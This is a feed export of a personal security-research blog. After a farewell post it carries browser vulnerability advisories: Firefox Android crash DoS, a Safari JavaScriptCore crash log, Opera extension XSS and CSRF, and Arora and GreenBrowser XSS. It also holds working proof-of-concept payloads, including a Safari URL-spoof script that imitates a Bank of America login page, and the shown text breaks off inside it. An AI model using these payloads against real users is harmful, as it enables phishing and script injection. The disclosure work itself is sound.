tag:blogger.com,1999:blog-90115782024-02-06T21:12:58.492-08:00Lostmon BloggerSecurity Research & Analisys:<br>
Personal Blog where I expose my investigations,<br>
advisores and some outstanding news on security.<br>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comBlogger1961999tag:blogger.com,1999:blog-9011578.post-74289584558584616502023-05-09T11:05:00.003-07:002023-05-09T11:10:32.072-07:00That is All <p> Lostmon disappeared a few years ago. My way of working and the excessive hours in front of a computer, coupled with high levels of stress and family problems, have led me to a situation where I feel trapped and unable to escape.</p><p>Everyone must fight their own inner demons when they come to visit.</p><p>Reality is just a point of view, and even when we see reality with our own eyes, it can vary and differ from another observer's perspective.</p><p>This has led me to suffer from a mental illness called bipolar schizoaffective disorder. </p><p>Dealing with my enemy is not easy, and I do not want to feed my demons, but computing, PCs, hardware and software, as well as bugs and other technological worlds, have become a mere anecdote in this daily struggle.</p><p>Thank you to all who supported me and believed in me one day.</p><p>Good luck, peace and harmony to all!</p><p>la curiosidad, es lo que hace mover la mente...</p><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-54923485336274954802022-11-14T08:58:00.005-08:002022-11-18T07:29:12.729-08:00Opera, chrome, Firefox, edge browsers DeadSystemException deeplinks and share links Crash DoS<p> Waiting for disclosing details</p><p><br /></p><p>https://bugs.chromium.org/p/chromium/issues/detail?id=1385502</p><p>https://github.com/mozilla-mobile/focus-android/issues/8056</p><p>Related vuln :</p><p>http://lostmon.blogspot.com/2022/10/mozilla-firefox-focus-and-nightly.html</p><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-47294620162298679952022-10-12T10:11:00.032-07:002022-11-25T11:26:28.429-08:00Mozilla firefox focus and Nightly for Android remote crash DoS<p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span><span style="background-color: white; color: #4e2800; font-size: 15.84px;">########</span></p><p><span style="color: #4e2800;"><span style="background-color: white; font-size: 15.84px;">Mozilla Firefox, Focus and Nightly</span></span></p><p><span style="color: #4e2800;"><span style="background-color: white; font-size: 15.84px;">For Android Remote Crash Dos </span></span></p><p><span style="color: #4e2800;"><span style="background-color: white; font-size: 15.84px;">Vulnerability.</span></span></p><p><span style="color: #4e2800;"><span style="background-color: white; font-size: 15.84px;">Last update: 25/11/2022</span></span></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span><span style="background-color: white; color: #4e2800; font-size: 15.84px;">########</span></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;"><br /></span></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">Description </span></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span></p><p>A vulnerability is present in the way that Mozilla for Android mobile products manage the clipboard and handle excepcions. </p><p>A evil site can take profit from software excepcions to do a crash in the app or to deny access to clipboard and cause a crash resulting in lost of available information that not save. </p><p>If we close the app and clear cache etc, we have the same situation a crash or a Dos that Tdo a crash. :)</p><p>The vulnerability interact with parts of Android system like open links in app, and sharing functions. </p><p>It's a of different error messages that the app can't handle or programmer store remote data in parcels, or how store data in clipboard and how process it. </p><p>Multiple app are vulnerable to this style attack resulting in a lost of data, DoS to application, crash aplicattion or DoS to functions or application or dead browser treat activity and force user to close App. </p><p>We can abuse parcels errors in</p><p>TransactionTooLargeException</p><p>DeadSystemException</p><p>Wen can abuse open in app or sharing functions or clipboard functions in</p><p><br /></p><p>TransactionTooLargeException</p><p>DeadSystemException</p><p>ClipboardManager</p><p>content.ClipboardManager.getPrimaryClip</p><p><br /></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span></p><p>Versions afected:</p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span></p><p>Mozilla firefox </p><p>107.1.0 Build #2015915067</p><p>106.1.0 built 2015907747</p><p>105.2.0 built 2015907747</p><p><br /></p><p>Mozilla Nightly </p><p>107.0a1 </p><p>built 2015909163 </p><p>built 2015909131</p><p>built 2015915115</p><p>108.0a1 </p><p>built 2015912339 </p><p>built 2015913675</p><p>109.0a1 </p><p>Build 2015916075</p><p>Build 2015917035</p><p>Build 2015917803</p><p><br /></p><p>Mozilla Focus </p><p>105.0.2 </p><p>built 362762015</p><p>107.1.0</p><p>Built 363142253</p><p>#########################</p><p>Related bugs in other apps</p><p>https://bugs.chromium.org/p/chromium/issues/detail?id=1385502</p><p><br /></p><p>Mozilla issue tracker </p><p>https://github.com/mozilla-mobile/focus-android/issues/8056</p><p>Posible related bug</p><p>https://github.com/mozilla-mobile/android-components/issues/12804</p><p>Tested on</p><p>Android 9, 10, 11, 12 and continue testing</p><p><br /></p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span></p><p>Timelime</p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">################</span></p><p>Discovered 28-08-2022</p><p>Vendor notify NO</p><p>Released 12-10-2022</p><p>Last update 25-11-2022</p><p><span style="background-color: white; color: #4e2800; font-size: 15.84px;">###############</span></p><p>No more details at this time. </p><p>Exploit available in private. </p><p>I update this advisore in few days with more information. </p><p><br /></p><p><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">################ €nd ####################</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">--</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">atentamente:</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">Lostmon (lostmon@gmail.com)</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">Web-Blog: http://lostmon.blogspot.com/</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">Google group: http://groups.google.com/group/lostmon (new)</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">--</span><br style="background-color: white; color: #4e2800; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" /><span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #4e2800; font-size: 15.84px;">La curiosidad es lo que hace mover la mente.... </span></p><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-20742820180294639202013-12-14T15:18:00.000-08:002013-12-14T15:25:12.776-08:00Safari for windows 5.1.7 (7534.57.2) Remote code execution############################################<br />
Safari for windows 5.1.7 (7534.57.2) Remote code execution<br />
JavaScriptCore.dll (7534.57.3.3)<br />
Vendor notify: NO Exploit available: Private<br />
Advisore:http://lostmon.blogspot.com.es/2013/12/safari-for-windows-517-7534572-remote.html<br />
#############################################<br />
<br />
Safari for windows is a discontinued product; but in my work
) tecnical support for clients and bussines) i found it installed in serveral
machines.<br />
<br />
Iit is prone vulnerable to a buffer overflow in JavaScriptCore.dll that allows remote crash if failed
or Remote Code Execution if the exploit is succesfully.<br />
<br />
This issue is tiggered when safari try to allocate a large amount of data in javascript stack memory.<br />
We espect a " out of memory" alert box, but we can bypass or fuzzing this alert and result a RCE.<br />
<br />
i don't like the responses from Apple amd this is a discontinued product....
See Windbg Log for this issue:<br />
<br />
<pre>(1240.1334): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=77d25085 edx=00000000 esi=1d7c0000 edi=7ff90240
eip=61b39357 esp=0023f01c ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Safari\Apple Application Support\JavaScriptCore.dll -
JavaScriptCore!WTF::fastMalloc+0x157:
61b39357 c705efbeadbb00000000 mov dword ptr ds:[0BBADBEEFh],0 ds:0023:bbadbeef=????????
0:000> !load msec.dll
0:000> !exploitable -m
VERSION:1.6.0.0
IDENTITY:HostMachine\HostUser
PROCESSOR:X86
CLASS:USER
QUALIFIER:USER_PROCESS
EVENT:DEBUG_EVENT_EXCEPTION
EXCEPTION_FAULTING_ADDRESS:0xffffffffbbadbeef
EXCEPTION_CODE:0xC0000005
EXCEPTION_LEVEL:SECOND_CHANCE
EXCEPTION_TYPE:STATUS_ACCESS_VIOLATION
EXCEPTION_SUBTYPE:WRITE
FAULTING_INSTRUCTION:61b39357 mov dword ptr ds:[0bbadbeefh],0
MAJOR_HASH:0x7fdedd27
MINOR_HASH:0x39b7b969
STACK_DEPTH:6
STACK_FRAME:JavaScriptCore!WTF::fastMalloc+0x157
STACK_FRAME:WebKit!WKDictionaryGetTypeID+0xb112
STACK_FRAME:WebKit!WKCredentialGetTypeID+0x1f776
STACK_FRAME:WebKit!WKCredentialGetTypeID+0x489f2
STACK_FRAME:WebKit!WKCredentialGetTypeID+0x4337e
STACK_FRAME:JavaScriptCore!JSC::JSArray::getOwnPropertySlotByIndex+0x2a44
INSTRUCTION_ADDRESS:0x0000000061b39357
INVOKING_STACK_FRAME:0
DESCRIPTION:User Mode Write AV
SHORT_DESCRIPTION:WriteAV
CLASSIFICATION:EXPLOITABLE
BUG_TITLE:Exploitable - User Mode Write AV starting at JavaScriptCore!WTF::fastMalloc+0x0000000000000157 (Hash=0x7fdedd27.0x39b7b969)
EXPLANATION:User mode write access violations that are not near NULL are exploitable.0:000> !exploitable
!exploitable 1.6.0.0
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at JavaScriptCore!WTF::fastMalloc+0x0000000000000157 (Hash=0x7fdedd27.0x39b7b969)
User mode write access violations that are not near NULL are exploitable.
</pre>
####################### €nd ########################## <br />
--<br />
atentamente:
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--
La curiosidad es lo que hace mover la mente.... <div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-76142373878586676022013-08-27T14:59:00.001-07:002013-08-27T15:04:43.108-07:00Opera browser Speed dial Extensions XSS and CSRF########################################<br />
Opera Browser Speed Dial Extensions XSS and XSRF<br />
Original advisore: http://lostmon.blogspot.com.es/2013/08/opera-browser-speed-dial-extensions-xss.html <br />
########################################<br />
<br />
############<br />
Description:<br />
############<br />
<br />
Speed Dial gives you quick access to your favorite Web sites. Every time you open a new tab, you are presented with a 3x3 grid of thumbnails, each representing a Web address. To open a page, click on the corresponding thumbnail, or use the keyboard shortcuts. http://help.opera.com/Mac/10.50/en/speeddial.html<br />
<br />
#########<br />
Abstract<br />
#########<br />
<br />
Developers Build Extensions for fast access to web services like<br />
Gmail, Flirk or Facebook.<br />
<br />
Speed dial "protect users" to direct XSS attacks, but the extensions used in Speed ??Dial, are not free of bugs and some of them are not safe. A remote attacker could compose special attacks, for abusing the functionality of these extensions in Speed Dial.<br />
<br />
<br />
####################<br />
Extensions for Gmail<br />
####################<br />
<br />
This two extenions show latest unread Emails from Gmail and are prone vulnerables to XSS & CSRF style atacks.<br />
<br />
######<br />
XSS:<br />
######<br />
<br />
If a attacker write a Email and in subject insert a html code it is executed in the extension.<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbWL0lAMgS1MQsI-M8IuSRY5YKVZQraWI61hdUxQmhUoHmjo9ho55KZ6KKKftHop5Ree8xkSosFMYYXyaeEq4yX-gPRdMpFMVlr6RdDoh4loA8z1nLc6BZSxm3EUgHyKGFEzi0/s1600/svg.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbWL0lAMgS1MQsI-M8IuSRY5YKVZQraWI61hdUxQmhUoHmjo9ho55KZ6KKKftHop5Ree8xkSosFMYYXyaeEq4yX-gPRdMpFMVlr6RdDoh4loA8z1nLc6BZSxm3EUgHyKGFEzi0/s400/svg.png" width="400" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
######<br />
XSRF:<br />
######<br />
<br />
If a attacker compose a Email with subject like <br />
"><iframe src="https://mail.google.com/mail/?logout&hl=es"<>/iframe><br />
when the extension refresh content, it cause victim logout function.<br />
<br />
<br />
https://addons.opera.com/es/extensions/details/gmail-on-speed-dial-ex/<br />
https://addons.opera.com/es/extensions/details/gmail-on-speed-dial/<br />
<br />
##############################<br />
Extensions for Google Calendar<br />
##############################<br />
<br />
This Two extensions Show reminders and events from Google Calendar<br />
and are prone vulnerables to XSS & CSRF style attacks<br />
<br />
######<br />
XSS:<br />
######<br />
<br />
If a attacker write a event in a shared calendar and in subject insert a html code it is executed in the extension.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBoxZow78isVr3AohNi6HZeeBRNHKt_tYN0QsDGngNyDddeb-HGAtaPemzHZYFSDqHZUlIOA9irto4QLed2fFEv2icqfVtgyKTewE-c08EzavjHU-P9p9XxeUKju-woQOOXA5J/s1600/iframe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBoxZow78isVr3AohNi6HZeeBRNHKt_tYN0QsDGngNyDddeb-HGAtaPemzHZYFSDqHZUlIOA9irto4QLed2fFEv2icqfVtgyKTewE-c08EzavjHU-P9p9XxeUKju-woQOOXA5J/s400/iframe.png" width="400" /></a><br />
<br />
######<br />
XSRF:<br />
######<br />
<br />
If a attacker a event in a shared calendar with subject like <br />
"><iframe src="https://www.google.com/calendar/logout"<>/iframe><br />
when the extension refresh content, it cause victim logout function.<br />
<br />
<br />
https://addons.opera.com/es/extensions/details/google-calendar/<br />
https://addons.opera.com/es/extensions/details/gcaltoday/<br />
<br />
################<br />
Related Links<br />
################<br />
<br />
http://lostmon.blogspot.com.es/2010/09/google-chrome-instaled-extensions.html<br />
http://www.osvdb.org/search?search[vuln_title]=lostmon%20extension&search[text_type]=alltext<br />
http://www.oxdef.info/posts/2011/01/18/chrome-ext/<br />
http://www.pcmag.com/article2/0,2817,2359778,00.asp<br />
<br />
<br />
############## End ########################<br />
<br />
##################<br />
Solution<br />
###################<br />
<br />
No solution was available at this time !!!<br />
<br />
################ €nd ####################<br />
<br />
-- <br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....
<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-61700107049357003412012-07-31T10:34:00.000-07:002012-07-31T10:34:46.128-07:00Arora qrc: dialog XSS and DoS########################################<br />
Arora qrc: dialog XSS and DoS<br />
Vendor URL:http://code.google.com/p/arora/<br />
Advisore: http://lostmon.blogspot.com.es/2012/07/arora-qrc-dialog-xss-and-dos.html<br />
Vendor notify:NO exploit available:yes<br />
#######################################<br />
<br />
Arora is a lightweight cross-platform web browser. It's free (as in free speech and free beer). <br />
Arora runs on Linux, embedded Linux, FreeBSD, Mac OS X, Windows, Haiku, and any other platforms <br />
supported by the Qt toolkit.<br />
<br />
Arora uses the QtWebKit port of the fully standards-compliant WebKit layout engine. <br />
It features fast rendering, powerful JavaScript engine and supports Netscape plugins. <br />
<br />
Arora contains a two flaws that allows a remote cross site scripting (XSS) attack and DoS. <br />
<br />
This flaw exists because the application does not validate the qrc: Uri dialog and <br />
internal error pages. This may allow a user to create a specially crafted Link/url that <br />
would execute arbitrary script code in a user's browser within the trust relationship<br />
between their browser and the qrc handler ( local ).<br />
<br />
Also Arora has a second flaw that allow Denial of service or app to crash in a special link.<br />
<br />
<br />
#################<br />
Proof of Concept<br />
#################<br />
<br />
create a html doc and write this code, click in the link and it execute <br />
the xss and if accept the alert box, the app crash :)<br />
<html><body><br />
<a href='qrc:/"><script>alert('Sorry, Now Your App Crash!');</script>'>Arora about: handler XSS</a><br />
</body></html><br />
<br />
################<br />
Versions afected<br />
################<br />
<br />
<span class="h3">Arora 0.10.0 Windows Qt 4.5.3</span><br />
<br />
##################<br />
Solution<br />
###################<br />
<br />
No solution was available at this time !!!<br />
<br />
################ €nd ####################<br />
<br />
-- <br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-12271844331944073292012-04-22T23:51:00.000-07:002012-04-22T23:57:02.994-07:00Firefox 11 DoS using exponential string growth and document.write()#############################################<br />
Firefox 11 DoS using exponential string growth and document.write()<br />
Vendor URL: http://www.mozilla.org<br />
Advisore: http://lostmon.blogspot.com.es/2012/04/firefox-11-dos-using-exponential-string.html<br />
Vendor Bugzilla: https://bugzilla.mozilla.org/show_bug.cgi?id=744637<br />
Vendor Notify: YES <br />
##############################################<br />
<br />
Mozilla firefox for windows in prone vulnerable to a denial of service condition. This think crash is tigger when load a malformed page with a malicious script, that fill up the memory.<br />
<br />
####################<br />
Versions affceted<br />
####################<br />
<br />
Mozilla Firefox 11.0<br />
<br />
##############<br />
Solution<br />
###############<br />
<br />
No solution was available at this time!!<br />
<br />
#############<br />
Proof Of Concept<br />
##############<br />
<br />
see https://bugzilla.mozilla.org/show_bug.cgi?id=744637<br />
<br />
<br />
################ €nd ######################<br />
<br />
-- <br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<br />
<br /><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-72680038727787344112012-03-27T15:16:00.002-07:002012-03-27T15:28:20.868-07:00GreenBrowser About: dialog XSS and stored XSS########################################<br />
GreenBrowser About: dialog XSS and stored XSS<br />
Vendor URL:http://www.morequick.com/<br />
advisore: http://lostmon.blogspot.com/2012/03/greenbrowser-about-dialog-xss-and.html<br />
Vendor notify:NO exploit available:yes<br />
#######################################<br />
<br />
GreenBrowser is your best choice of flexible and powerful green web browser.
GreenBrowser is free to download and use.<br />
<br />
GreenBrowser contains a two flaws that allows a remote cross site scripting (XSS) attack.
This flaw exists because the application does not validate the about: Uri dialog and last visited
pages. This may allow a user to create a specially crafted URL that would execute arbitrary
script code in a user's browser within the trust relationship between their browser
and the server.<br />
<br />
Also the browser save the last URL visited and then, if a user create a crafted link
and clin in, it is a stored XSS because when open the browser by default it open
http://www.5igb.com/StartEn.htm and it have the last visited URL... The xss is executed
in this URL :) page and browser not validate LastVisitWriteEn() before render to the user.<br />
<br />
You can see this function here => http://www.5igb.com/function.js<br />
<br />
#################<br />
Proof of Concept<br />
#################<br />
<br />
create a html doc and write this code, click in the link and it execute the xss
close the browser and open it again, in last visit pages we have the url of PoC
and it executes the stored XSS<br />
<br />
<html><body><br />
<a href='about:"><script>alert(1)</script>'>GreenBrowser about: handler XSS</a><br />
</body></html><br />
<br />
################<br />
Versions afected<br />
################<br />
<br />
6.1.0117 (2012-01-17 10:22:02)<br />
6.1.0216 (2012-02-16 21:37:10)<br />
<br />
##################<br />
Solution<br />
###################<br />
<br />
No solution was available at this time !!!<br />
<br />
################ €nd ####################<br />
<br />
<pre>--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
</pre><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-4495439000466423372012-03-27T10:35:00.001-07:002012-04-03T15:29:08.647-07:00Safari for windows 5.1.5 and prior and IOS URL spoof window.open() test case###########################################<br />
Safari for windows 5.1.5 and prior URL window.open() spoof<br />
Vendor URL: http://www.apple.com<br />
Advisore: <a href="http://lostmon.blogspot.com/2012/03/safari-for-windows-515-and-prior-and.html">http://lostmon.blogspot.com/2012/03/safari-for-windows-515-and-prior-and.html</a><br />
Vendor Notify: YES Exploit available: YES<br />
##########################################<br />
<br />
##############<br />
History:<br />
##############<br />
<br />
Safari has a serious issues with protocol handlers, for long times in diferents protocols and handlers i had report
four or five vulnerabilities in protocols handlers.
i had report a telnet issue in safari for windows, <strike>what Apple patched in silence.</strike><br />
<br />
Today i download and test Safari for windows 5.1.5 only for look if the vulnerability that i report in 03/2012 is patched..
see => http://lostmon.blogspot.com/2012/03/safari-for-windows-and-ios-url-weakness.html
Safari for windows 5.1.5 have the same vulnerability ummm....<br />
<br />
############<br />
Description<br />
############<br />
<br />
Safari set the bar higher for web browsers. It introduced
sophisticated design elements that made browsing a joy.
Easy to use, Safari stayed out of your way and let you
effortlessly navigate from site to site.
Safari for windows Ignore what protocol handler we use, it don't
check if protocol is registered or simply don't check any handler...
In the case what i talk.... A pseudo url spoof can be posible let's
to see some examples to undestanding the nature of this vulnerability.<br />
<br />
Case "about:" Protocol handler.
type in addressbar "about:blank" . and it shows about blank page,
this is what we espect and this template is OK.
Type in addressbar "about:something" and the title and URL shows the same (about:something)
type "about:http://www.bankofamerica.com" and the tithe shows the same...<br />
<br />
Now the best thing is write a title to simulate the title of original page and
write some content in this window (about:http://www.bankofamerica.com)
the URL show it but in reality we are in about:blank page...<br />
<br />
############<br />
PoC's<br />
############<br />
<br />
Create a function to open a new window and write location...<br />
<br />
var wx;
function invokePoC() {
wx = open("about:http://www.bankofamerica.com/login","newwin");
setInterval("doit()",1);
}<br />
<br />
And create a function to write in the result window.<br />
<br />
function doit() {
wx.document.open();
wx.document.write("<title>spoof title</title><body><h1><b>Hello !! i'm a Spoofed Site !!!</b></h1></body>");
}<br />
<br />
With this a remote attacker can do spoof o phishing attacks, but if we think that safari has issues in handlers
the best attack is delete about: protocol handler and simulate bankofamerica for example.
we can oncatenate a www as a handler and concatenate http: handler to get a nice url :)<br />
<br />
##########################<br />
Safari for windows URL Spoof<br />
##########################<br />
<br />
This PoC simulate banc of america URL and content.
The image is enbended via Data: schema.<br />
<br />
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><br />
<html><br />
<head><br />
<title>Safari for windows 5.1.5 and prior URL spoof window.open() test case.</title><br />
<script type="text/javascript"><br />
var wx;<br />
function invokePoC() {<br />
wx = open("http://www:bankofamerica.com/login","newwin");<br />
setInterval("doit()",1);<br />
}<br />
function doit() {<br />
wx.document.open();<br />
wx.document.write("<title>Bank of America | Home | Personal</title><body><img src='data:image/gif;base64,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